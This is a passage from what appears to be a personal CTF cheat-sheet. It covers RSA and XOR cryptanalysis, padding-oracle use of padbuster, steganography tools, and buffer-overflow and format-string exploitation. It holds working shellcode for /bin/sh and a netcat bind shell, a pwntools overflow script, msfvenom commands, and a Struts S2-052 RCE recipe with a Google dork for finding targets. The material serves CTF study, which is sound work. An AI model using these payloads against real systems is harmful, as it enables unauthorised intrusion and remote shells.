695 | c1=hex(c)[2:].rstrip('L') // drop the 0x prefix and Python 2's trailing L; if len(c1) is odd prepend a '0' or .decode('hex') fails 696 | c=c1.decode('hex') 697 | 698 | *common factor (two moduli sharing a prime: gcd(N1,N2) recovers it) 699 | *Wiener attack when d is small, which shows up as an unusually large e (close to N in size); common modulus attack when the same N appears in two public keys with different e 700 | *Fermat factorization when p and q are close to sqrt(N) 701 | * if the same message is encrypted with the same small e (typically 3) under at least e different N then Hastad broadcast 702 | ------------------------------------------------------------------------------- 703 | #abctf2016 704 | import cryptanalib as ca 705 | n1= 706 | c1= 707 | n2= 708 | c2= 709 | n3= 710 | c3= 711 | c=ca.hastad_broadcast_attack([(c1,n1),(c2,n2),(c3,n3)], 3) 712 | print ca.long_to_string(c) 713 | 714 | 715 | openssl s_client -connect host:993 //connect to imap over ssl/tls; plain telnet only works against the cleartext port 143, 993 needs the TLS wrapper 716 | a login "username" "password" //enter if dovecot is ready 717 | 718 | 719 | goto RsaCtfTool for different attack 720 | useful features in RsaCtfTool 721 | openssl rsautl -decrypt -in $ENCRYPTED -out $PLAINTEXT -inkey keys/privkey.pem 722 | openssl rsautl -encrypt -in $PLAINTEXT -out $PLAINTEXT.encrypt -pubin -inkey keys/pubkey.pem //both default to PKCS#1 v1.5 padding; add -raw for textbook RSA 723 | 724 | 725 | Chinese Remainder Theorem 726 | ---------------------------- 727 | if N has more than two prime factors (multi-prime RSA) then this method. 728 | if you are given c,n and using yafu you found multiple primes then this method. 
729 | https://github.com/diogoaj/ctf-writeups/tree/master/2018/Timisoara/crypto/NotYourAverageRSA 730 | 731 | # From https://crypto.stackexchange.com/questions/31109/rsa-enc-decryption-with-multiple-prime-modulus-using-crt # needs: primes = list of all prime factors of n, e, c (ciphertext as int), n, and a modinv(a, m) helper (e.g. libnum.modular.invmod) 732 | ts = [] 733 | xs = [] 734 | ds = [] 735 | for i in range(len(primes)): 736 | ds.append(modinv(e, primes[i]-1)) 737 | m = primes[0] 738 | for i in range(1, len(primes)): 739 | ts.append(modinv(m, primes[i])) 740 | m = m * primes[i] 741 | for i in range(len(primes)): 742 | xs.append(pow((c%primes[i]), ds[i], primes[i])) 743 | x = xs[0] 744 | m = primes[0] 745 | for i in range(1, len(primes)): 746 | x = x + m * ((xs[i] - x % primes[i]) * (ts[i-1] % primes[i])) 747 | m = m * primes[i] 748 | print hex(x%n)[2:-1].decode("hex") # [2:-1] drops '0x' and Python 2's trailing 'L'; if there is no L use hex(x%n)[2:].rstrip('L') and left-pad with '0' when the length is odd 749 | 750 | 751 | 752 | from Crypto.PublicKey import RSA 753 | f1 = open("pubkey1.txt", "r") 754 | key = RSA.importKey(f1.read()) 755 | print "n1 =", key.n 756 | print "e1 =", key.e 757 | f2 = open("pubkey2.txt", "r") # presumably the second key file; the note had pubkey1.txt here 758 | key = RSA.importKey(f2.read()) # was f1.read(): f1 is already at EOF so importKey got an empty string 759 | print "n2 =", key.n 760 | print "e2 =", key.e 761 | f3 = open("flag.enc", "rb") 762 | print f3.read().encode('hex') 763 | 764 | 765 | 766 | from Crypto.Cipher import AES 767 | from binascii import a2b_base64 768 | def AES_128_ECB_decrypt(data, key): # ECB: no IV, key must be exactly 16 bytes, data a multiple of 16 bytes 769 | cipher = AES.new(key, AES.MODE_ECB) 770 | return cipher.decrypt(data) 771 | filename = '7.txt' 772 | key = 'YELLOW SUBMARINE' 773 | data = a2b_base64(''.join(line.strip() for line in open(filename))) 774 | print AES_128_ECB_decrypt(data, key) 775 | 776 | 777 | def find_zero_md5md5(): # needs import hashlib; looks for a number whose md5(md5(i)+"SALT") is a PHP "0e..." magic hash 778 |   for i in xrange(0,99999999): 779 |     t = str(i) 780 |     ct = t 781 |     ha = hashlib.md5() 782 |     ha.update(ct) 783 |     md5 = ha.hexdigest() 784 |     ha = hashlib.md5() 785 |     ha.update(md5+ "SALT") 786 |     md52 = ha.hexdigest() 787 |     if md52.startswith('0e') and md52[2:].isdigit(): 788 |       return ct,md5,md52 789 |     if ((i % 1000000) == 0): 790 |       print i 791 |   return None, None, None # was return "": the a,b,c = ... unpack below raises ValueError on that path 792 | a,b,c = 
find_zero_md5md5() 793 | print a,b,c 794 | 795 | 796 | 797 | openssl enc -aes-128-ecb -a -in input2 -out output -K 59454c4c4f57205355424d4152494e45 //-K takes the raw key as hex (this is "YELLOW SUBMARINE"); -k "YELLOW SUBMARINE" would be a passphrase run through salted EVP_BytesToKey, i.e. a different key, and the output would not match the Python AES snippet above 798 | openssl enc -d -aes-128-ecb -a -in input2 -out output -K 59454c4c4f57205355424d4152494e45 799 | 800 | Use factordb.com to find p and q 801 | 802 | vigenere cipher 803 | ============= 804 | https://www.guballa.de/vigenere-solver 805 | 806 | XOR 807 | ========== 808 | 1.first try to guess the key like flag{ and xor it with the ciphertext . 809 | if the key is longer then try to find the rest of it. 810 | 2. use xortool or kasiski examination to find key length 811 | xortool -o a.txt 812 | cat xortool_out/* | strings | grep flag 813 | 814 | 815 | 816 | if you have no idea what to do then xor it 817 | XOR three file (key reuse / two-time pad: known plaintext of one file gives the keystream, which decrypts the other file encrypted under the same key) 818 | ----------------- 819 | def xor_strings(a, b): 820 | return ''.join(chr(ord(i) ^ ord(j)) for i, j in zip(a, b)) # zip stops at the shorter input, so the recovered key only covers len(heart_clear) bytes 821 | heart_clear = open('Heart_clear.txt').read() 822 | heart_crypt = open('Heart_crypt.txt').read() 823 | key = xor_strings(heart_clear, heart_crypt) 824 | mind_crypt = open('Mind_crypt.txt').read() 825 | mind_clear = xor_strings(mind_crypt, key) 826 | print mind_clear 827 | 828 | 829 | 830 | key = '\x96\xa4*\xc3\x96\x73' 831 | counter = 0 832 | answer = '' 833 | for i in open('cry200.txt', 'rb').read(): 834 | answer += chr(ord(i)^ord(key[counter%6])) 835 | counter += 1 836 | print answer 837 | 838 | def xorr(text,key): 839 | return ''.join(chr(ord(a)^ord(b)) for a,b in zip(text,key)) 840 | text='KGZFK\qZFG]qA\qZFOZ' 841 | for i in range (128): 842 | print xorr(text,chr(i)*len(text)) 843 | 844 | 845 | ascii checking 846 | ---------------------- 847 | if all(ord(char) < 128 for char in text2): 848 | 849 | find length find key encrypt file bruteforce key 850 | --------------- ----------------------------------- ------------------------------- ----------------- ------------------- 851 | 1. 
xortool a.txt xortool test.txt.xor -l 10 -c 00 xortool test.txt "secret_key" xortool -x encrypted.txt -b 852 | 853 | * 854 | find key 855 | 856 | PADDING ORACLE 857 | ========================= 858 | Decryption 859 | ------------ 860 | padbuster http://88.198.233.174:35082/profile.php yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg= 8 -encoding 0 --cookie "iknowmag1k=yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg=;PHPSESSID=tdd5b0jl58sf70ve667r9n1et6" 861 | 862 | Encryption 863 | --------------- 864 | padbuster http://88.198.233.174:35082/profile.php yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg= 8 -encoding 0 --cookie "iknowmag1k=yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg=;PHPSESSID=tdd5b0jl58sf70ve667r9n1et6" -plaintext {\"user\":\"admin\",\"role\":\"admin\"} 865 | 866 | 867 | RAW HASH 868 | =============== 869 | 9fcef3897afe2acc3e7438ce14f5b6a3 raw hash make sql injection INCTF 870 | 871 | MEDIA 872 | ==================== 873 | mp3 874 | ----------- 875 | https://academo.org/demos/spectrum-analyzer/ 876 | 877 | mediainfo =>info about audio/video 878 | ffmpeg -i song.webm -map 0:2 out.wav => extract hidden audio file 879 | multimon-ng -t wav -a DTMF out.wav =>decode dual tone 880 | 881 | CRYPTO 882 | ========================================================= 883 | 1.Xor 2.shift 3.RotN 4.Vegenere 5.substitution 884 | 885 | STTEGO 886 | ====================================================================================================== 887 | ===================================================================================================== 888 | 1.binwalk 2.exiftool 3.ghex 4.strings 5.openstego 6.stegsolve 7.steghide(support JPEG,BMP,wav,AU) 889 | 890 | binwalk --dd='.*' music.mp3 891 | steghide extract -sf steghide.jpg -p password (always use this for addition info or if password protected) 892 | 893 | if noclue about image the try reverse 
google image search 894 | 895 | if found image ,first check binwalk file.png for hidden file then extract using dd 896 | dd if=example.jpg bs=1 skip=1972141 of=foo.zip 897 | foremost -t zip -i exaple.jpg -o folder 898 | 899 | IMAGE PIXEL 900 | =============== 901 | http://www.boyter.org/decoding-captchas/ 902 | https://github.com/VulnHub/ctf-writeups/blob/master/2015/hackim/web-500.md 903 | 904 | from PIL import Image 905 | im = Image.open("dead_parrot.jpg") 906 | pix = im.load() 907 | width,height=im.size 908 | for i in range(width): 909 | for j in range(height): 910 | print pix[i,j] 911 | im.save("alive_parrot.png") # Save the modified pixels as png 912 | 913 | 914 | REVERSE ENG 915 | ============================================================================================================= 916 | ============================================================================================================= 917 | 1.gdb 2.ida 3.r2 4.hopper 918 | 919 | netcat pwn 920 | -------------------- 921 | from pwn import * 922 | r = remote('ezpz.wpictf.xyz', 31337) 923 | msg = r.recvline() 924 | flag_address = int(msg.split(' ')[1], 16) 925 | r.recvline() 926 | buf = 'A'*0x88 927 | buf += p64(flag_address) 928 | r.sendline(buf) 929 | r.interactive() 930 | 931 | 932 | ** 933 | if there is input required to validate a string or get target and after many operation it check final output then u could use angr 934 | https://blog.techorganic.com/2018/04/21/stem-cyber-challenge-2018-keygenme/ 935 | 936 | 937 | BUFFER OVERFLOW 938 | ================ 939 | ***find return address 940 | python -c "print 'A'*32 + 'BBBB'" | strace -i ./pwn4 |& grep si_addr 941 | 942 | ***x/40wx $esp =>print stack and find whre buffer start 943 | *** info frame =>get ebp and eip ADDRESS 944 | ***info register =>get all register 945 | *** 946 | 1.first try to find out max length by segment fault like { python -c "print 'A'*30" |./a.out } 947 | 2. now have to overwrite RT to some other function address. 
948 | {objdump -d ./a.out } and find the function name. 949 | Use gdb to find the address of that function 950 | now type { python -c "print 'A'*30+'\x12\x44\x04\x08'" |./a.out } //the return address must be all 4 bytes, little-endian (0x08044412 -> '\x12\x44\x04\x08'); if the target spawns a shell use (python -c "..."; cat) | ./a.out so stdin stays open 951 | 952 | 3. objdump -t ./a.out|grep variable 953 | 4. print win //in gdb used to find address of func/variable 954 | 955 | ** 956 | ltrace= trace calls into dynamic libraries (libc functions such as gets/strcpy) 957 | strace= trace system calls 958 | ***** 959 | *****another way to find length for buffer overflow 960 | a) first make break point after gets 961 | b) give input in buffer AAAAAAA 962 | c) print x/40wx $esp and get the buffer address //also you can find buffer start using assembly line [ lea -0x5c(%esp) %eax] 963 | d) print info frame // get return address(eip) //the last eip in showing result 964 | e) calculate length to overflow like [address of saved eip]-[start buffer address] (that many bytes of padding, then the 4-byte address) 965 | 966 | also can find overflow length with [python -c "print 'A'*76+'BBBB'"|strace -i ./stack5] 967 | 968 | find eip overwritten or not / find buffer overflow length 969 | ------------------------------------------------------- 970 | put break point after gets. give input AAAAAA... and hit breakpoint. 971 | find start of buffer using x/120s $esp 972 | type info frame and get first saved eip and check does it overwritten. 973 | 974 | **** 975 | suppose buffer is 64 bytes and it requires 76 bytes to overwrite ebp and another 4 bytes to overwrite eip. 976 | now we can put shellcode within 76 bytes and jump eip to start of the buffer and also put \x90 in starting of buffer. thus we can execute shellcode. (only works with an executable stack and no ASLR: check with checksec / cat /proc/sys/kernel/randomize_va_space; stack addresses also shift slightly between gdb and a normal run, which is what the \x90 sled absorbs) 977 | But also try to put shellcode after eip because if shellcode is large and buffer is small 978 | 979 | putting shellcode after RT 980 | --------------------------------- 981 | a) python -c "print 'A'*76+'BBBB'+'C'*120"|./stack5 982 | now print x/10s $esp in gdb , if C found in stack then you can put shellcode after eip. 
983 | b) python -c "print 'A'*76+'addresss where \x90 or C start to jump'+'\x90'*120+'shellcode....'"|./stack5 984 | 985 | try netcat shellcode "\xbd\x9b\x77\x1c\xf3\xdd\xc0\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x14\x31\x6b\x14\x83\xeb\xfc\x03\x6b\x10\x79\x82\x2d\x28\x8a\x8e\x1d\x8d\x27\x3b\xa0\x98\x26\x0b\xc2\x57\x28\x37\x55\x3a\x40\xca\x69\xab\xcc\xa0\x79\x9a\xbc\xbd\x9b\x76\x5a\xe6\x96\x07\x2b\x57\x2d\xbb\x2f\xe8\x4b\x76\xaf\x4b\x24\xee\x62\xcb\xd7\xb6\x16\xf3\x8f\x85\x66\x42\x49\xee\x0e\x7a\x86\x7d\xa6\xec\xf7\xe3\x5f\x83\x8e\x07\xcf\x08\x18\x26\x5f\xa5\xd7\x29" 986 | it will create nc -lnvp 4444 -e /bin/sh command 987 | 988 | *** 989 | push %ebp 990 | mov %esp,%ebp 991 | and $0xfffffff0,%esp 992 | sub $0x60,%esp 993 | movl $0x0,0x5c(%esp) 994 | lea 0x1c(%esp),%eax 995 | mov %eax,(%esp) 996 | call 0x804830c 997 | 998 | buffer address esp+0x1c stored in eax and then pushed into esp ,so we can stored value there. 999 | if we break point after gets and print x $esp we get address of buffer esp+0x1c 1000 | 1001 | 1002 | 1003 | shellcode 1004 | ----------- 1005 | http://www.theprohack.com/2010/09/buffer-overflow-attack-tutorial-by.html 1006 | \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 => 25 bytes https://dhavalkapil.com/blogs/Shellcode-Injection/ 1007 | \x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80 => 32 bytes https://samsclass.info/127/proj/p3-lbuf1.htm 1008 | 1009 | metasploit shellcode 1010 | ------------- 1011 | msfvenom -p linux/x86/exec -f pl -b '\x0d\x0a\x00\xff' CMD=/bin/sh PrependSetresuid=true 1012 | 1013 | 1014 | 1015 | #!/usr/bin/env python 1016 | offset = 72 1017 | shellcode = "\xb8\x2f\x73\x68\xf0\x25\xff\xff\xff\x0f\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80" 1018 | nopsled = "\x90" * (offset - len(shellcode)) 1019 | ret = "\x90\xf7\xff\xbf" 1020 | payload = nopsled + shellcode + "JJJJ" 
+ ret 1021 | print payload 1022 | 1023 | 1024 | #include 1025 | #include 1026 | #include 1027 | #include 1028 | 1029 | int main(int argc, char **argv) 1030 | { 1031 | volatile int modified; 1032 | char buffer[64]; 1033 | 1034 | modified = 0; 1035 | gets(buffer); 1036 | 1037 | if(modified != 0) { 1038 | printf("you have changed the 'modified' variable\n"); 1039 | } else { 1040 | printf("Try again?\n"); 1041 | } 1042 | } 1043 | 1044 | 1045 | 1046 | 1047 | push %rbp //push base pointer in stack 1048 | 0x0000000000400505 <+1>: mov %rsp,%rbp //asign rsp as rbp 1049 | 0x0000000000400508 <+4>: sub $0x60,%rsp //rsp move to rsp-96 1050 | 0x000000000040050c <+8>: mov %edi,-0x54(%rbp) 1051 | 0x000000000040050f <+11>: mov %rsi,-0x60(%rbp) 1052 | 0x0000000000400513 <+15>: movl $0x0,-0x4(%rbp) //move zero to rbp-4 for modified=0 1053 | 0x000000000040051a <+22>: lea -0x50(%rbp),%rax //buffer allocate , rbp-0x50 address of buffer where it starting move to rax 1054 | 0x000000000040051e <+26>: mov %rax,%rdi 1055 | 0x0000000000400521 <+29>: callq 0x400410 //call gets to this buffer 1056 | 0x0000000000400526 <+34>: mov -0x4(%rbp),%eax //value of rbp-4 is 0 move to eax 1057 | 0x0000000000400529 <+37>: test %eax,%eax 1058 | 0x000000000040052b <+39>: je 0x400539 1059 | 0x000000000040052d <+41>: mov $0x400648,%edi 1060 | 0x0000000000400532 <+46>: callq 0x4003f0 1061 | 0x0000000000400537 <+51>: jmp 0x400543 1062 | 0x0000000000400539 <+53>: mov $0x400671,%edi 1063 | 0x000000000040053e <+58>: callq 0x4003f0 1064 | 0x0000000000400543 <+63>: leaveq 1065 | 0x0000000000400544 <+64>: retq 1066 | 1067 | 1068 | so here modified varriable located at rbp-4 and its value is 0.buffer start at rbp-0x50 1069 | so we have to make it 1 1070 | 1071 | so total byte need to overwrite modified verriable at rbp-4 address is $rbp-0x50-$rbp-0x4 1072 | 1073 | finding length of buffer overflow 1074 | ----------------------------------- 1075 | * give input like AAAAA and if it gives segfault at specific number then 
it is total length from that buffer to RT.because after buffer fullit overwrite ebp then RT address. 1076 | 1077 | *run gdb , set break point ,give input AAAAAA.... and it hit breakpoint . 1078 | run x/120x $esp and it gives values stored in stack 1079 | find here address of values 0x41(A) and this is start address of buffer 1080 | run x $ebp and it gives address of $ebp 1081 | now again run x/120X $esp and find offset between previous buffer address and $ebp 1082 | ex: 1083 | (gdb) x/120x $esp 1084 | 0xffffcec0: 0xfe 0xce 0xff 0xff 0x01 0x00 0x00 0x00 1085 | 0xffffcec8: 0xc2 0x00 0x00 0x00 0xd1 0xd1 0xff 0xff 1086 | 0xffffced0: 0xfe 0xce 0xff 0xff 0x00 0xd0 0xff 0xff 1087 | >0xffffced8: 0x00 0x00 0x00 0x00 0x41 0x41 0x41 0x41 1088 | 0xffffcee0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1089 | 0xffffcee8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1090 | 0xffffcef0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1091 | 0xffffcef8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1092 | 0xffffcf00: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1093 | 0xffffcf08: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1094 | 0xffffcf10: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1095 | 0xffffcf18: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1096 | 0xffffcf20: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1097 | 0xffffcf28: 0x00 0xcf 0xff 0xff 0x1d 0x85 0x04 0x08 1098 | 0xffffcf30: 0xd1 0xd1 0xff 0xff 0xf4 0xcf 0xff 0xff 1099 | here buffer start at 0xffffcedc whhere value 0x41(because we gave AAAA.. as input) 1100 | and $ebp at 0xffffcf28 ,so we can find offset between them + 4 RT 1101 | 1102 | 1103 | FORMAT STRNGS 1104 | ----------------- 1105 | %n is used to write in memory 1106 | 1.first find out where our data is located in stack using => ./vuln "`python -c "print 'AAAA '+'BBBB'+'%x '*100"`" 1107 | 2.it print AAAA 0xbffff.. 0xbff... AAAA BBBB =>here do it still you your first string BBBB in last like here 1108 | 3.Here you have to replace BBBB with address to write in memory. 
1109 | 1110 | suppose address of variable whose value is to be overwritten is 0x639874 1111 | a) ./vuln "`python -c "print 'AAAA '+'BBBB'+'%x '*100"`" 1112 | it prints AAAA....0x...BBBB (count how many %x values come before 42424242: that is the stack position k of your input) 1113 | b) ./vuln "`python -c "print 'AAAA '+'\x74\x98\x63\x00'+'%x '*99+'%n'"`" 1114 | it will overwrite the value at the given address - but only if the %n lands on the stack slot holding the address: use k-1 %x (from step a), not a fixed 99; write all 4 bytes little-endian; and since 0x00639874 contains a NUL byte the argv string ends there, so put the address at the END of the payload (4-byte aligned) and reach it with direct parameter access like '%<k>$n'. %n writes the number of bytes printed so far, so set the value with a width specifier such as %1234x before it (confirm the layout with x/40wx $esp in gdb) 1115 | https://www.youtube.com/watch?v=0WvrSfcdq1I 1116 | 1117 | a)./vuln "`python -c "print 'AAAA'+'%x '*100"`"%x 1118 | it prints AAAA....0x...AAAA 1119 | b) ./vuln "`python -c "print 'address'+'%x '*100"`"%n 1120 | 1121 | 1122 | 1123 | ROP 1124 | ------------ 1125 | 1126 | RETURN TO LIB 1127 | --------------- 1128 | 1129 | STRUTS s2-052 rest plugin rce 1130 | ====================== 1131 | dork: filetype:action,do 1132 | *first set content type application/xml in the request and send this data to a REST-plugin endpoint (the note says GET; public PoCs send it as the request body, so a POST is the usual shape) 1133 | 1134 | 1135 | 0 false 0 calc false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 (this is the XStream XML payload with its tags stripped by the copy - only the values survive, e.g. the ProcessBuilder command "calc" and the "start" method; rebuild it from the S2-052 advisory) 1136 | 1137 | 1138 | 1139 | 1140 | 1141 | LINK 1142 | ========================= 1143 | xmlrpc 1144 | ----------------- 1145 | https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 1146 | 1147 | 1148 | 1149 | 1150 | 1151 | 1152 | --------------------------------------------------------------------------------